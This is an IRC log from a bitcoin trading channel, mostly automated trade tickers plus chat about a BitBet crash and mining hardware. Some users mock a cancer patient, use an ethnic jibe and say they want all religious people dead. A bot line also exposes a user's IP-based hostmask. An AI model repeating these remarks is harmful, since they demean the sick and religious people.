[BTCTC] [DMS.MINING] 16 @ 0.00299 = 0.0478 BTC [+] Sep 08 23:39:11 [BTCTC] [DMS.MINING] 100 @ 0.002995 = 0.2995 BTC [+] Sep 08 23:40:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0235 BTC [+] Sep 08 23:44:10 from #bitcoin Sep 08 23:44:11 [23:40] bitfury is not performing at 400 gh ¿? Sep 08 23:44:24 it seems like the bet is getting a lot of attention. Sep 08 23:44:37 this is big news in bitcoinland right now.... big news.... Sep 08 23:47:22 [BTCTC] [DMS.SELLING] 10 @ 0.009272 = 0.0927 BTC [-] Sep 08 23:47:49 [BTCTC] [DMS.PURCHASE] 10 @ 0.01208 = 0.1208 BTC [-] Sep 08 23:51:08 [BTCTC] [ACTIVEMINING] 40 @ 0.003589 = 0.1436 BTC [+] Sep 08 23:51:47 [BTCTC] [ACTIVEMINING] 10 @ 0.003589 = 0.0359 BTC [+] Sep 08 23:59:21 [MPEX] [S.BBET] 20000 @ 0.00065 = 13 BTC [-] Sep 09 00:01:21 [MPEX] [S.BBET] 2500 @ 0.00063511 = 1.5878 BTC [-] Sep 09 00:01:30 [MPEX] [S.BBET] 5000 @ 0.0006351 = 3.1755 BTC [-] Sep 09 00:01:31 [MPEX] [S.BBET] 2500 @ 0.000635 = 1.5875 BTC [-] Sep 09 00:04:26 [MPEX] [S.BBET] 500 @ 0.000635 = 0.3175 BTC [-] Sep 09 00:04:27 [MPEX] [S.BBET] 2000 @ 0.00061 = 1.22 BTC [-] Sep 09 00:04:41 [MPEX] [S.BBET] 1000 @ 0.0006 = 0.6 BTC [-] Sep 09 00:04:56 shit bitbet tanking on news of corruption Sep 09 00:05:02 [BTCTC] [NASTY-PT] 1 @ 0.002 BTC [+] Sep 09 00:06:15 HAHAHAHAHAHAHAHAHA Sep 09 00:06:26 I gotta log that Sep 09 00:08:54 [BTCTC] [LABCOIN] 5 @ 0.003661 = 0.0183 BTC [-] Sep 09 00:09:24 [BTCTC] [LABCOIN] 10 @ 0.00366 = 0.0366 BTC [-] Sep 09 00:09:47 [MPEX] [S.BBET] 3480 @ 0.000555 = 1.9314 BTC [-] Sep 09 00:10:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0235 = 0.047 BTC [+] Sep 09 00:11:07 [MPEX] [S.BBET] 520 @ 0.000555 = 0.2886 BTC [-] Sep 09 00:11:18 [MPEX] [S.BBET] 1000 @ 0.00055051 = 0.5505 BTC [-] Sep 09 00:11:20 [MPEX] [S.BBET] 1980 @ 0.0005505 = 1.09 BTC [-] Sep 09 00:11:22 [BTCTC] [ACTIVEMINING] 40 @ 0.003589 = 0.1436 BTC [+] Sep 09 00:11:23 [BTCTC] [ACTIVEMINING] 20 @ 0.00359 = 0.0718 BTC [+] Sep 09 00:11:24 [BTCTC] [ACTIVEMINING] 34 @ 0.003605 = 0.1226 BTC [+] Sep 09 00:11:25 [BTCTC] [ACTIVEMINING] 17 @ 0.003606 = 0.0613 BTC [+] Sep 09 00:11:26 [BTCTC] [ACTIVEMINING] 40 @ 0.003625 = 0.145 BTC [+] Sep 09 00:11:27 [BTCTC] [ACTIVEMINING] 20 @ 0.003626 = 0.0725 BTC [+] Sep 09 00:11:28 [BTCTC] [ACTIVEMINING] 123 @ 0.003629 = 0.4464 BTC [+] Sep 09 00:11:30 [BTCTC] [ACTIVEMINING] 80 @ 0.00363 = 0.2904 BTC [+] Sep 09 00:11:30 [BTCTC] [ACTIVEMINING] 100 @ 0.00363 = 0.363 BTC [+] Sep 09 00:11:31 [BTCTC] [ACTIVEMINING] 751 @ 0.003758 = 2.8223 BTC [+] Sep 09 00:12:31 [BTCTC] [PAJKA.BOND] 3 @ 0.0125 = 0.0375 BTC [+] Sep 09 00:12:49 [MPEX] [S.BBET] 1790 @ 0.0005505 = 0.9854 BTC [-] Sep 09 00:20:43 big news Sep 09 00:20:44 [BTCTC] [LABCOIN] 80 @ 0.00366 = 0.2928 BTC [-] Sep 09 00:20:49 Bitbet stock crashing Sep 09 00:20:57 Bitbet going to 0. corruption / bribe scandals Sep 09 00:20:59 big news Sep 09 00:21:13 guys. cats say meow. dogs say woof woof Sep 09 00:21:14 dont forget Sep 09 00:21:15 [BTCTC] [COGNITIVE] 1 @ 0.3397 BTC [+] Sep 09 00:21:16 [BTCTC] [COGNITIVE] 1 @ 0.3397 BTC [+] Sep 09 00:21:17 [BTCTC] [COGNITIVE] 1 @ 0.3398 BTC [+] Sep 09 00:21:18 [BTCTC] [COGNITIVE] 1 @ 0.3398 BTC [+] Sep 09 00:21:19 [BTCTC] [COGNITIVE] 3 @ 0.34 = 1.02 BTC [+] Sep 09 00:21:20 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [+] Sep 09 00:21:38 [HAVELOCK] [XBOND] 2 @ 0.001135 = 0.0023 BTC [-] Sep 09 00:22:06 i'll let you guys know what happens after bfsb gets back to me on the 400GH unit email Sep 09 00:22:07 bbl Sep 09 00:22:55 thestringpuller: I can't believe you donated to that fuckwad Sep 09 00:23:13 I have a soft spot for cancer patients Sep 09 00:23:18 he should man up and let God take care of him Sep 09 00:23:26 I mean sure I could email him, "Get a job, get health insurance" etc. but meh Sep 09 00:23:35 he's working hard for that money Sep 09 00:23:40 so why not mang? Sep 09 00:24:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.02204 = 0.0441 BTC [-] Sep 09 00:24:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02203 = 0.2203 BTC [-] Sep 09 00:24:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02201 = 0.044 BTC [-] Sep 09 00:24:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.022 = 0.088 BTC [-] Sep 09 00:24:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.022 = 0.22 BTC [-] Sep 09 00:24:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.02161 = 0.4322 BTC [-] Sep 09 00:25:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.0216 = 0.108 BTC [-] Sep 09 00:26:20 cause god is gonna look after is ass Sep 09 00:28:24 Ima setup a dozen of these bullshit scab blogs and donate proceeds to Irans nuclear program Sep 09 00:29:47 is that like a joke on how america believe God will save everyone? Sep 09 00:29:51 or some bs like that? Sep 09 00:30:00 no his blog is full of the shit Sep 09 00:30:16 pray for me, god is great, derka derka derka Sep 09 00:30:44 [HAVELOCK] [XBOND] 1 @ 0.00111002 BTC [-] Sep 09 00:30:48 [HAVELOCK] [XBOND] 3 @ 0.00111001 = 0.0033 BTC [-] Sep 09 00:30:51 [HAVELOCK] [XBOND] 62 @ 0.00111 = 0.0688 BTC [-] Sep 09 00:30:55 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Sep 09 00:31:52 [BTCTC] [TAT.ASICMINER] 18 @ 0.02349 = 0.4228 BTC [+] Sep 09 00:32:17 you an atheist dub, or just don't like zealots? Sep 09 00:33:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.02349 = 0.1409 BTC [+] Sep 09 00:35:03 I guess atheist.. or whatever it is when you want all religious people to die Sep 09 00:36:14 ;;ident Duffer1 Sep 09 00:36:14 Nick 'Duffer1', with hostmask 'Duffer1!~chatzilla@c-98-232-231-188.hsd1.or.comcast.net', is not identified. Sep 09 00:38:03 [BTCTC] [ACTIVEMINING] 8 @ 0.003757 = 0.0301 BTC [-] Sep 09 00:38:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.02349 = 0.1409 BTC [+] Sep 09 00:39:56 [BTCTC] [COG.F2] 1 @ 4.89 BTC [+] Sep 09 00:49:41 [BTCTC] [DMS.PURCHASE] 170 @ 0.01208 = 2.0536 BTC [-] Sep 09 00:49:56 [BTCTC] [DMS.MINING] 20 @ 0.002813 = 0.0563 BTC [-] Sep 09 00:51:19 [BTCTC] [DMS.SELLING] 20 @ 0.009272 = 0.1854 BTC [-] Sep 09 00:52:20 [BTCTC] [DMS.PURCHASE] 20 @ 0.01208 = 0.2416 BTC [-] Sep 09 00:57:12 [BTCTC] [DMS.SELLING] 81 @ 0.009272 = 0.751 BTC [-] Sep 09 00:57:56 [BTCTC] [DMS.SELLING] 89 @ 0.009271 = 0.8251 BTC [-] Sep 09 01:00:28 [HAVELOCK] [XBOND] 16 @ 0.001135 = 0.0182 BTC [+] Sep 09 01:00:34 [BTCTC] [DMS.PURCHASE] 111 @ 0.01208 = 1.3409 BTC [-] Sep 09 01:04:42 [BTCTC] [DMS.SELLING] 111 @ 0.009271 = 1.0291 BTC [-] Sep 09 01:08:09 [HAVELOCK] [XBOND] 2 @ 0.00113999 = 0.0023 BTC [+] Sep 09 01:08:42 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Sep 09 01:09:32 [BTCTC] [DMS.PURCHASE] 100 @ 0.01208 = 1.208 BTC [-] Sep 09 01:14:42 [BTCTC] [DMS.SELLING] 20 @ 0.00927 = 0.1854 BTC [-] Sep 09 01:15:20 [BTCTC] [DMS.SELLING] 80 @ 0.009268 = 0.7414 BTC [-] Sep 09 01:20:36 ValueError: need more than 1 value to unpack (file "/pyenv/coinflow27/local/lib/python2.7/site-packages/willie/coretasks.py", line 132, in track_modes) Sep 09 01:29:15 [BTCTC] [LABCOIN] 5 @ 0.003666 = 0.0183 BTC [+] Sep 09 01:29:16 [BTCTC] [LABCOIN] 40 @ 0.003665 = 0.1466 BTC [-] Sep 09 01:29:18 [BTCTC] [LABCOIN] 844 @ 0.00366 = 3.089 BTC [-] Sep 09 01:31:34 [BTCTC] [LABCOIN] 186 @ 0.00366 = 0.6808 BTC [-] Sep 09 01:31:35 [BTCTC] [LABCOIN] 20 @ 0.003652 = 0.073 BTC [-] Sep 09 01:31:37 [BTCTC] [LABCOIN] 75 @ 0.003626 = 0.272 BTC [-] Sep 09 01:37:15 [BTCTC] [LABCOIN] 10 @ 0.003601 = 0.036 BTC [-] Sep 09 01:37:17 [BTCTC] [LABCOIN] 100 @ 0.0036 = 0.36 BTC [-] Sep 09 01:37:18 [BTCTC] [LABCOIN] 109 @ 0.0036 = 0.3924 BTC [-] Sep 09 01:42:02 [BTCTC] [DMS.MINING] 18 @ 0.0029 = 0.0522 BTC [+] Sep 09 01:42:37 [BTCTC] [DMS.SELLING] 18 @ 0.009268 = 0.1668 BTC [-] Sep 09 01:45:23 [BTCTC] [DMS.PURCHASE] 18 @ 0.01208 = 0.2174 BTC [-] Sep 09 01:48:02 [HAVELOCK] [AM100] 40 @ 0.0208 = 0.832 BTC [-] Sep 09 01:49:20 [BTCTC] [ACTIVEMINING] 1 @ 0.003583 BTC [-] Sep 09 01:49:21 [BTCTC] [ACTIVEMINING] 4 @ 0.003582 = 0.0143 BTC [-] Sep 09 01:49:22 [BTCTC] [ACTIVEMINING] 7 @ 0.003571 = 0.025 BTC [-] Sep 09 01:49:24 [BTCTC] [ACTIVEMINING] 28 @ 0.00357 = 0.1 BTC [-] Sep 09 01:49:25 [BTCTC] [ACTIVEMINING] 2 @ 0.003552 = 0.0071 BTC [-] Sep 09 01:49:26 [BTCTC] [ACTIVEMINING] 10 @ 0.003551 = 0.0355 BTC [-] Sep 09 01:49:27 [BTCTC] [ACTIVEMINING] 15 @ 0.003512 = 0.0527 BTC [-] Sep 09 01:49:28 [BTCTC] [ACTIVEMINING] 60 @ 0.003511 = 0.2107 BTC [-] Sep 09 01:49:29 [BTCTC] [ACTIVEMINING] 25 @ 0.003505 = 0.0876 BTC [-] Sep 09 01:49:29 [BTCTC] [ACTIVEMINING] 100 @ 0.003504 = 0.3504 BTC [-] Sep 09 01:49:31 [BTCTC] [ACTIVEMINING] 1 @ 0.003503 BTC [-] Sep 09 01:49:32 [BTCTC] [ACTIVEMINING] 1950 @ 0.003502 = 6.8289 BTC [-] Sep 09 01:49:33 [BTCTC] [ACTIVEMINING] 9500 @ 0.003501 = 33.2595 BTC [-] Sep 09 01:49:34 [BTCTC] [ACTIVEMINING] 17136 @ 0.0035 = 59.976 BTC [-] Sep 09 01:51:00 [BTCTC] [ACTIVEMINING] 8 @ 0.003504 = 0.028 BTC [+] Sep 09 01:53:58 [BTCTC] [DMS.MINING] 190 @ 0.002812 = 0.5343 BTC [-] Sep 09 01:54:26 [BTCTC] [DMS.MINING] 13 @ 0.002796 = 0.0363 BTC [-] Sep 09 01:54:28 [BTCTC] [DMS.MINING] 24 @ 0.002794 = 0.0671 BTC [-] Sep 09 01:54:29 [BTCTC] [DMS.MINING] 667 @ 0.002615 = 1.7442 BTC [-] Sep 09 01:58:25 [BTCTC] [LABCOIN] 5 @ 0.003688 = 0.0184 BTC [+] Sep 09 01:58:27 [BTCTC] [LABCOIN] 20 @ 0.003689 = 0.0738 BTC [+] Sep 09 01:58:27 [BTCTC] [LABCOIN] 104 @ 0.003693 = 0.3841 BTC [+] Sep 09 01:58:28 [BTCTC] [LABCOIN] 606 @ 0.003695 = 2.2392 BTC [+] Sep 09 01:58:29 [BTCTC] [LABCOIN] 1800 @ 0.003697 = 6.6546 BTC [+] Sep 09 01:58:30 [BTCTC] [LABCOIN] 20 @ 0.0037 = 0.074 BTC [+] Sep 09 01:58:32 [BTCTC] [LABCOIN] 1160 @ 0.0037 = 4.292 BTC [+] Sep 09 01:58:32 [BTCTC] [LABCOIN] 700 @ 0.0037 = 2.59 BTC [+] Sep 09 01:58:34 [BTCTC] [LABCOIN] 1500 @ 0.00371 = 5.565 BTC [+] Sep 09 01:58:35 [BTCTC] [LABCOIN] 1000 @ 0.00371 = 3.71 BTC [+] Sep 09 01:59:13 [BTCTC] [ACTIVEMINING] 40 @ 0.00352 = 0.1408 BTC [+] Sep 09 02:00:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.02333 BTC [-] Sep 09 02:00:55 [BTCTC] [DMS.SELLING] 1 @ 0.009489 BTC [+] Sep 09 02:12:56 [BTCTC] [PETA-MINE] 3 @ 0.6599 = 1.9797 BTC [+] Sep 09 02:15:53 [BTCTC] [ACTIVEMINING] 750 @ 0.0034 = 2.55 BTC [-] Sep 09 02:18:54 [BTCTC] [DMS.PURCHASE] 1 @ 0.01208 BTC [-] Sep 09 02:32:57 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [+] Sep 09 02:32:59 [BTCTC] [ASICMINER-PT] 1 @ 2.468 BTC [+] Sep 09 02:33:27 [HAVELOCK] [XBOND] 56 @ 0.001135 = 0.0636 BTC [-] Sep 09 02:43:17 lol Sep 09 02:44:09 [MPEX] [S.MPOE] 8400 @ 0.00089548 = 7.522 BTC [-] Sep 09 02:44:11 [MPEX] [S.MPOE] 2550 @ 0.00089609 = 2.285 BTC [+] Sep 09 02:45:55 [BTCTC] [LABCOIN] 5 @ 0.00365 = 0.0183 BTC [-] Sep 09 02:46:16 [BTCTC] [LABCOIN] 75 @ 0.003651 = 0.2738 BTC [+] Sep 09 02:46:45 [BTCTC] [ACTIVEMINING] 200 @ 0.003537 = 0.7074 BTC [+] Sep 09 02:47:09 [BTCTC] [ACTIVEMINING] 5 @ 0.003537 = 0.0177 BTC [+] Sep 09 02:48:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.02333 = 0.0933 BTC [-] Sep 09 02:49:06 [BTCTC] [ACTIVEMINING] 17 @ 0.003533 = 0.0601 BTC [-] Sep 09 02:53:32 [HAVELOCK] [SMG] 50 @ 0.00019 = 0.0095 BTC [-] Sep 09 02:53:36 [HAVELOCK] [SMG] 45 @ 0.00018525 = 0.0083 BTC [-] Sep 09 02:53:40 [HAVELOCK] [SMG] 7 @ 0.00018001 = 0.0013 BTC [-] Sep 09 02:53:43 [HAVELOCK] [SMG] 110 @ 0.00018 = 0.0198 BTC [-] Sep 09 02:53:47 [HAVELOCK] [SMG] 50 @ 0.00018 = 0.009 BTC [-] Sep 09 02:53:50 [HAVELOCK] [SMG] 238 @ 0.0001791 = 0.0426 BTC [-] Sep 09 02:54:47 [HAVELOCK] [LABCO] 10 @ 0.00333 = 0.0333 BTC [+] Sep 09 02:57:45 [HAVELOCK] [LABCO] 62 @ 0.003339 = 0.207 BTC [+] Sep 09 03:01:49 [HAVELOCK] [AM100] 125 @ 0.0208 = 2.6 BTC [-] Sep 09 03:04:08 [MPEX] [S.MPOE] 7850 @ 0.0008992 = 7.0587 BTC [+] Sep 09 03:12:59 [HAVELOCK] [LABCO] 15 @ 0.003339 = 0.0501 BTC [+] Sep 09 03:13:33 [HAVELOCK] [XBOND] 5 @ 0.00113899 = 0.0057 BTC [+] Sep 09 03:14:12 [BTCTC] [TAT.ASICMINER] 16 @ 0.02201 = 0.3522 BTC [-] Sep 09 03:14:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.022 = 0.066 BTC [-] Sep 09 03:15:23 [BTCTC] [COGNITIVE] 10 @ 0.31 = 3.1 BTC [-] Sep 09 03:15:24 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Sep 09 03:17:28 [MPEX] [S.MPOE] 561 @ 0.0008992 = 0.5045 BTC [+] Sep 09 03:19:19 who said my name Sep 09 03:22:31 johngalt where's that ? Sep 09 03:25:19 [BTCTC] [ASICMINER-PT] 6 @ 2.45 = 14.7 BTC [-] Sep 09 03:26:26 [BTCTC] [DMS.MINING] 20 @ 0.002902 = 0.058 BTC [+] Sep 09 03:26:27 [BTCTC] [DMS.MINING] 158 @ 0.002903 = 0.4587 BTC [+] Sep 09 03:29:35 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Sep 09 03:32:03 [BTCTC] [ASICMINER-PT] 4 @ 2.468 = 9.872 BTC [+] Sep 09 03:36:10 [BTCTC] [ACTIVEMINING] 125 @ 0.00356 = 0.445 BTC [+] Sep 09 03:36:36 [BTCTC] [TAT.ASICMINER] 16 @ 0.02349 = 0.3758 BTC [+] Sep 09 03:37:45 ;;bcstats Sep 09 03:37:47 Current Blocks: 256831 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 1216 blocks | Next Difficulty In About: 1 week, 0 days, 7 hours, 48 minutes, and 26 seconds | Next Difficulty Estimate: 99777058.0828 | Estimated Percent Change: 14.77464 Sep 09 03:37:48 ;;nethash Sep 09 03:37:49 704477.654601 Sep 09 03:38:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.0235 = 0.1175 BTC [+] Sep 09 03:38:34 [BTCTC] [TAT.ASICMINER] 70 @ 0.0235 = 1.645 BTC [+] Sep 09 03:46:48 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [+] Sep 09 03:50:06 [MPEX] [S.MPOE] 1600 @ 0.00090046 = 1.4407 BTC [+] Sep 09 03:51:50 [BTCTC] [ACTIVEMINING] 50 @ 0.003531 = 0.1766 BTC [-] Sep 09 03:59:35 [BTCTC] [ACTIVEMINING] 10 @ 0.003514 = 0.0351 BTC [-] Sep 09 03:59:36 [BTCTC] [ACTIVEMINING] 40 @ 0.003515 = 0.1406 BTC [+] Sep 09 04:00:49 [BTCTC] [LABCOIN] 1000 @ 0.003652 = 3.652 BTC [+] Sep 09 04:07:39 Anduck dude where's my money! Sep 09 04:09:47 [BTCTC] [TAT.ASICMINER] 16 @ 0.02201 = 0.3522 BTC [-] Sep 09 04:09:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.02201 = 0.2201 BTC [-] Sep 09 04:09:50 [BTCTC] [TAT.ASICMINER] 46 @ 0.022 = 1.012 BTC [-] Sep 09 04:11:37 Mircea, anything interesting in the last few days? I have been out Sep 09 04:12:16 nothing really big. Sep 09 04:13:19 I made my own creation, a get work to stratum so my blades can mine solo Sep 09 04:13:21 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Sep 09 04:13:22 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1998 = 0.5994 BTC [+] Sep 09 04:13:24 [BTCTC] [CRYPTO-TRADE] 20 @ 0.1998 = 3.996 BTC [+] Sep 09 04:13:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.000619 = 0.0012 BTC [-] Sep 09 04:13:48 Been running 3 days without a problem Sep 09 04:15:20 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [+] Sep 09 04:15:21 [BTCTC] [ASICMINER-PT] 2 @ 2.469 = 4.938 BTC [+] Sep 09 04:15:32 that's pretty cool Sep 09 04:15:39 open source ? Sep 09 04:16:28 Yeah, I have so more stuff to add and it would be a fully functional pool that could be deployed in 15 minutes Sep 09 04:17:21 A blade could be added ( get work) from a remote location and use stratum native Sep 09 04:17:57 I have to figure out mysql, I have never used it before Sep 09 04:18:26 mysql takes about a day to figure out Sep 09 04:18:53 I will get it tomorrow I am sure, ran out of time before the weekend Sep 09 04:20:20 [BTCTC] [DMS.MINING] 7 @ 0.00298 = 0.0209 BTC [+] Sep 09 04:21:25 You can also request variable diff from a blade Sep 09 04:22:44 $vwap s.bbet Sep 09 04:22:46 mircea_popescu: S.BBET 1 day: average: 0.000623 high: 0.00065 low: 0.0005505 volume: 42270 btc: 26.33417 7 day: average: 0.00064251 high: 0.00074999 low: 0.0005505 volume: 52270 btc: 33.58407 30 day: average: 0.00066225 high: 0.00109999 low: 0.0005505 volume: 84850 btc: 56.1915442 Sep 09 04:23:09 derp Sep 09 04:24:23 [MPEX] [S.MG] 500 @ 0.00019001 = 0.095 BTC [-] Sep 09 04:24:25 [MPEX] [S.MG] 3500 @ 0.00019 = 0.665 BTC [-] Sep 09 04:26:22 [BTCTC] [BTC-GROWTH] 8 @ 0.0999 = 0.7992 BTC [+] Sep 09 04:26:36 [HAVELOCK] [XBOND] 1 @ 0.00113899 BTC [+] Sep 09 04:28:54 [BTCTC] [ACTIVEMINING] 200 @ 0.00355 = 0.71 BTC [+] Sep 09 04:29:06 [BTCTC] [ACTIVEMINING] 51 @ 0.00355 = 0.1811 BTC [+] Sep 09 04:32:33 [HAVELOCK] [XBOND] 1 @ 0.00113899 BTC [+] Sep 09 04:52:12 [BTCTC] [LABCOIN] 21 @ 0.003679 = 0.0773 BTC [+] Sep 09 04:53:00 [MPEX] [S.MPOE] 3650 @ 0.00090066 = 3.2874 BTC [+] Sep 09 04:57:38 [MPEX] [S.MPOE] 122 @ 0.00090046 = 0.1099 BTC [-] Sep 09 04:57:40 [MPEX] [S.MPOE] 3402 @ 0.00089888 = 3.058 BTC [-] Sep 09 04:58:14 [MPEX] [S.MPOE] 9798 @ 0.00089722 = 8.791 BTC [-] Sep 09 04:58:27 [HAVELOCK] [XBOND] 63 @ 0.00113899 = 0.0718 BTC [+] Sep 09 04:59:09 [MPEX] [S.MPOE] 378 @ 0.00089501 = 0.3383 BTC [-] Sep 09 05:08:46 [BTCTC] [ASICMINER-PT] 2 @ 2.469 = 4.938 BTC [+] Sep 09 05:12:37 [HAVELOCK] [AM100] 7 @ 0.02072 = 0.145 BTC [-] Sep 09 05:22:03 [BTCTC] [ACTIVEMINING] 32 @ 0.0035 = 0.112 BTC [-] Sep 09 05:22:41 [BTCTC] [LABCOIN] 35 @ 0.003679 = 0.1288 BTC [+] Sep 09 05:23:37 [BTCTC] [ACTIVEMINING] 100 @ 0.0035 = 0.35 BTC [-] Sep 09 05:24:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.0221 = 0.221 BTC [+] Sep 09 05:24:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0221 = 0.221 BTC [+] Sep 09 05:24:49 [BTCTC] [LABCOIN] 95 @ 0.003679 = 0.3495 BTC [+] Sep 09 05:25:20 [BTCTC] [LABCOIN] 9 @ 0.003679 = 0.0331 BTC [+] Sep 09 05:26:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.0221 = 0.1105 BTC [+] Sep 09 05:26:20 [BTCTC] [TAT.ASICMINER] 15 @ 0.02209 = 0.3314 BTC [-] Sep 09 05:26:44 [BTCTC] [DMS.SELLING] 2 @ 0.009268 = 0.0185 BTC [-] Sep 09 05:26:46 [BTCTC] [DMS.SELLING] 79 @ 0.009265 = 0.7319 BTC [-] Sep 09 05:26:47 [BTCTC] [DMS.SELLING] 25 @ 0.00926 = 0.2315 BTC [-] Sep 09 05:26:48 [BTCTC] [DMS.SELLING] 20 @ 0.009255 = 0.1851 BTC [-] Sep 09 05:26:50 [BTCTC] [DMS.SELLING] 250 @ 0.009252 = 2.313 BTC [-] Sep 09 05:26:51 [BTCTC] [DMS.SELLING] 1000 @ 0.00925 = 9.25 BTC [-] Sep 09 05:26:52 [BTCTC] [DMS.SELLING] 1200 @ 0.0092 = 11.04 BTC [-] Sep 09 05:26:59 [BTCTC] [ACTIVEMINING] 30 @ 0.0035 = 0.105 BTC [-] Sep 09 05:27:02 [BTCTC] [LABCOIN] 186 @ 0.003679 = 0.6843 BTC [+] Sep 09 05:27:16 [BTCTC] [LABCOIN] 2654 @ 0.003679 = 9.7641 BTC [+] Sep 09 05:27:17 [BTCTC] [LABCOIN] 50 @ 0.003728 = 0.1864 BTC [+] Sep 09 05:27:19 [BTCTC] [LABCOIN] 700 @ 0.003728 = 2.6096 BTC [+] Sep 09 05:27:20 [BTCTC] [LABCOIN] 150 @ 0.00374 = 0.561 BTC [+] Sep 09 05:27:21 [BTCTC] [LABCOIN] 450 @ 0.003745 = 1.6853 BTC [+] Sep 09 05:27:23 [BTCTC] [LABCOIN] 1 @ 0.003746 BTC [+] Sep 09 05:27:23 [BTCTC] [LABCOIN] 898 @ 0.003746 = 3.3639 BTC [+] Sep 09 05:27:24 [BTCTC] [LABCOIN] 150 @ 0.003747 = 0.5621 BTC [+] Sep 09 05:27:25 [BTCTC] [LABCOIN] 60 @ 0.003748 = 0.2249 BTC [+] Sep 09 05:27:26 [BTCTC] [LABCOIN] 1000 @ 0.003748 = 3.748 BTC [+] Sep 09 05:27:27 [BTCTC] [LABCOIN] 1000 @ 0.003749 = 3.749 BTC [+] Sep 09 05:28:36 [BTCTC] [ACTIVEMINING] 18 @ 0.003561 = 0.0641 BTC [+] Sep 09 05:31:26 [BTCTC] [ASICMINER-PT] 10 @ 2.47 = 24.7 BTC [+] Sep 09 05:31:39 [BTCTC] [LABCOIN] 200 @ 0.00375 = 0.75 BTC [+] Sep 09 05:31:40 [BTCTC] [LABCOIN] 100 @ 0.003755 = 0.3755 BTC [+] Sep 09 05:31:41 [BTCTC] [LABCOIN] 100 @ 0.003761 = 0.3761 BTC [+] Sep 09 05:31:42 [BTCTC] [LABCOIN] 100 @ 0.003761 = 0.3761 BTC [+] Sep 09 05:31:44 [BTCTC] [LABCOIN] 1000 @ 0.003769 = 3.769 BTC [+] Sep 09 05:31:44 [BTCTC] [LABCOIN] 1000 @ 0.00377 = 3.77 BTC [+] Sep 09 05:31:45 [BTCTC] [LABCOIN] 6 @ 0.003783 = 0.0227 BTC [+] Sep 09 05:31:46 [BTCTC] [LABCOIN] 1000 @ 0.003794 = 3.794 BTC [+] Sep 09 05:31:47 [BTCTC] [LABCOIN] 2000 @ 0.003794 = 7.588 BTC [+] Sep 09 05:31:48 [BTCTC] [LABCOIN] 614 @ 0.003795 = 2.3301 BTC [+] Sep 09 05:31:49 [BTCTC] [LABCOIN] 1850 @ 0.003795 = 7.0208 BTC [+] Sep 09 05:32:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.02339 = 0.117 BTC [+] Sep 09 05:32:26 [BTCTC] [LABCOIN] 100 @ 0.003798 = 0.3798 BTC [+] Sep 09 05:32:27 [BTCTC] [LABCOIN] 25 @ 0.003798 = 0.095 BTC [+] Sep 09 05:32:28 [BTCTC] [LABCOIN] 1000 @ 0.003798 = 3.798 BTC [+] Sep 09 05:32:29 [BTCTC] [LABCOIN] 1 @ 0.0038 BTC [+] Sep 09 05:32:30 [BTCTC] [LABCOIN] 40 @ 0.0038 = 0.152 BTC [+] Sep 09 05:32:31 [BTCTC] [LABCOIN] 2094 @ 0.0038 = 7.9572 BTC [+] Sep 09 05:32:32 [BTCTC] [LABCOIN] 160 @ 0.0038 = 0.608 BTC [+] Sep 09 05:32:33 [BTCTC] [LABCOIN] 12 @ 0.0038 = 0.0456 BTC [+] Sep 09 05:32:34 [BTCTC] [LABCOIN] 100 @ 0.0038 = 0.38 BTC [+] Sep 09 05:32:42 [BTCTC] [LABCOIN] 25 @ 0.003797 = 0.0949 BTC [-] Sep 09 05:33:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.0221 = 0.1105 BTC [-] Sep 09 05:33:35 [BTCTC] [LABCOIN] 5 @ 0.003797 = 0.019 BTC [-] Sep 09 05:33:37 [BTCTC] [ASICMINER-PT] 2 @ 2.47 = 4.94 BTC [+] Sep 09 05:34:08 [BTCTC] [LABCOIN] 970 @ 0.003797 = 3.6831 BTC [-] Sep 09 05:34:08 [BTCTC] [LABCOIN] 50 @ 0.003811 = 0.1906 BTC [+] Sep 09 05:34:09 [BTCTC] [LABCOIN] 238 @ 0.003815 = 0.908 BTC [+] Sep 09 05:34:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.0221 = 0.1105 BTC [-] Sep 09 05:35:49 [BTCTC] [ACTIVEMINING] 425 @ 0.003549 = 1.5083 BTC [-] Sep 09 05:39:23 [BTCTC] [LABCOIN] 200 @ 0.003799 = 0.7598 BTC [-] Sep 09 05:43:46 [BTCTC] [DMS.SELLING] 20 @ 0.00915 = 0.183 BTC [-] Sep 09 05:45:06 [BTCTC] [DMS.SELLING] 170 @ 0.009005 = 1.5309 BTC [-] Sep 09 05:45:14 Transisto https://bitcointalk.org/index.php?topic=140366.msg3111033#msg3111033 Sep 09 05:45:20 let me know if you get a straight answer, Sep 09 05:45:38 i took that thread off the girl's list she was spending entirely too much time having fun in there Sep 09 05:46:18 [BTCTC] [LABCOIN] 150 @ 0.003799 = 0.5699 BTC [-] Sep 09 05:46:49 q3 applies to 99% of threads anyway Sep 09 05:46:51 [BTCTC] [BTC-GROWTH] 10 @ 